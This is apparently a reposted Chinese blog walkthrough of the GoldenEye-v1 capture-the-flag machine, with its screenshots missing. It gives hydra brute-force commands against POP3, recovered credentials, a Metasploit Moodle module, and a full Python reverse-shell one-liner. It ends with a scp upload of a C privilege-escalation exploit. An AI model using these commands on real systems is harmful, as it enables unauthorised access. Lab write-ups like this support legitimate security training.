GoldenEye-v1靶机
阅读原文时间:2023年07月09日阅读:2

仅供个人娱乐

靶机信息

下载地址:https://pan.baidu.com/s/1dzs_qx-YwYHk-vanbUeIxQ

一、主机扫描

二、信息收集

三、漏洞的查找和利用

boris    InvincibleHack3r

进行登录

转化为小写登录成功

pop3 为55007端口

爆破

hydra -L 2.txt -P /usr/share/wordlists/fasttrack.txt pop3://192.168.56.130 -s 55007

boris        secret1!

Boris        secret1!

Natalya      bird

登录pop3服务

natalya账户

boris账户

发现信息

或者使用邮箱

xenia        RCP90rulez!

修改host 文件

windows出现问题(别尝试windows 有毒  慎重)    选择kali

修改hosts文件,访问severnaya-station.com/gnocertdir,是一个moodle学习管理系统

xenia        RCP90rulez!  登录

信息收集

得到用户名:“doak”,我们继续爆破试试

hydra -l doak -P /usr/share/wordlists/fasttrack.txt pop3://192.168.56.130 -s 55007

登录邮箱查看信息

USER dr_doak

PASS 4England!

得到密文:“eFdpbnRlcjE5OTV4IQ==”

密码为:“xWinter1995x!” 帐号为默认的 admin

登录  进行信息收集

use exploit/multi/http/moodle_cmd_exec

运行失败,百度参考大佬

设置路径为:Plugins— Text editors — TinyMCE HTML editor 在下拉选框中选择 “PSpellShell”

删除hosts文件内容  同样失败

搞不定  百度显示个人版本太高

第二种方法

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.129",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

反弹shell

python -c 'import pty; pty.spawn("/bin/bash")'

信息收集

ssh上传

开启:/etc/init.d/ssh start

scp root@192.168.56.129:/root/1.c /tmp/

编译   对c文件进行编译,有gcc,cc,cang,文件默认是gcc

失败

修改1.c文件 重名2.c

scp root@192.168.56.129:/root/2.c /tmp/

手机扫一扫

移动阅读更方便

阿里云服务器
腾讯云服务器
七牛云服务器

你可能感兴趣的文章